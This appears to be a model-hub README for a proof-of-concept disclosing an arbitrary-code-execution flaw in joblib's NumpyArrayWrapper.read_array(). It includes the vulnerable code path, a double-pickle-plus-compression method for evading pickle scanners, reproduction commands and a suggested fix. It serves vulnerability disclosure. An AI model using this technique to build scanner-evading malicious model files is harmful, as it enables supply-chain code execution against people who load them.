Joblib Double-Pickle `hasobject` ACE + Scanner Evasion PoC

Vulnerability Summary

Library: joblib (tested on 1.5.3, affects all versions with NumpyArrayWrapper) File: joblib/numpy_pickle.py Class: NumpyArrayWrapper.read_array() (lines 173-175) Severity: Critical (Arbitrary Code Execution on joblib.load()) CWE: CWE-502 (Deserialization of Untrusted Data)

Root Cause

When a persisted numpy array has dtype.hasobject == True (i.e., it contains Python objects), NumpyArrayWrapper.read_array() calls raw pickle.load() on the inner data stream:

# joblib/numpy_pickle.py, lines 173-175
def read_array(self, unpickler, ensure_native_byte_order):
    ...
    if self.dtype.hasobject:
        # The array contained Python objects. We need to unpickle the data.
        array = pickle.load(unpickler.file_handle)  # <-- RAW pickle.load!

This is distinct from the outer pickle stream, which is processed by NumpyUnpickler (joblib's custom unpickler subclass). The inner pickle.load() call uses stdlib pickle.load() directly, which executes any __reduce__-based payload.

Attack Vector: Double-Pickle Structure

A joblib file with this attack has two nested pickle streams:

[Outer Pickle Stream - parsed by NumpyUnpickler]
  -> NumpyArrayWrapper(dtype=object, hasobject=True)
  -> [Inner Pickle Stream - parsed by raw pickle.load()]
       -> __reduce__ payload (os.system, exec, etc.)

Why This Evades Scanners

Structural evasion: Security scanners (Picklescan, ModelScan, etc.) typically parse the pickle stream looking for dangerous opcodes (REDUCE, GLOBAL, etc.). They parse the outer pickle structure and see a benign NumpyArrayWrapper object. The inner pickle stream containing the actual RCE payload is embedded as raw bytes that are only deserialized at runtime.
Compression evasion: Wrapping the file in zlib/bz2/lzma/xz compression means scanners must first decompress to even see the outer pickle structure. Many static analysis tools skip compressed formats or only check known magic bytes.
Combined evasion: Compression + double-pickle = the scanner must decompress, parse the outer pickle, identify the hasobject code path, then parse the inner pickle stream. Most scanners do not implement this level of analysis.

Affected Code Path

joblib.load(filename)
  -> _unpickle(fobj, ...)
    -> NumpyUnpickler.load()
      -> load_build()  [sees NumpyArrayWrapper on stack]
        -> NumpyArrayWrapper.read(unpickler, ...)
          -> read_array(unpickler, ...)
            -> pickle.load(unpickler.file_handle)  # VULNERABLE - raw pickle!

Reproduction

Prerequisites

pip install joblib numpy

Step 1: Generate PoC files

python create_poc.py

This creates:

poc_plain.joblib - Uncompressed (double-pickle structure visible)
poc_zlib.joblib - Zlib compressed
poc_bz2.joblib - BZ2 compressed
poc_lzma.joblib - LZMA compressed
poc_xz.joblib - XZ compressed
benign.joblib - Benign reference file

Step 2: Verify exploitation

python verify_poc.py

This loads each PoC file with joblib.load() and checks for the pwned.txt marker file created by the payload.

Step 3 (optional): Test scanner evasion

pip install picklescan
picklescan --path poc_plain.joblib
picklescan --path poc_zlib.joblib
picklescan --path poc_lzma.joblib

Impact

Arbitrary Code Execution: Any user calling joblib.load() on an untrusted .joblib file is vulnerable.
Supply Chain Risk: Malicious .joblib model files can be distributed via model hubs (HuggingFace, etc.) and will execute code when loaded.
Scanner Bypass: The double-pickle structure combined with compression evades current model scanning tools that only analyze the outer pickle structure.

Suggested Fix

The read_array() method should use a restricted unpickler for the inner pickle.load() call, or at minimum use the same NumpyUnpickler class that processes the outer stream. Alternatively, joblib could restrict the classes allowed during deserialization of object arrays.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Joblib Double-Pickle hasobject ACE + Scanner Evasion PoC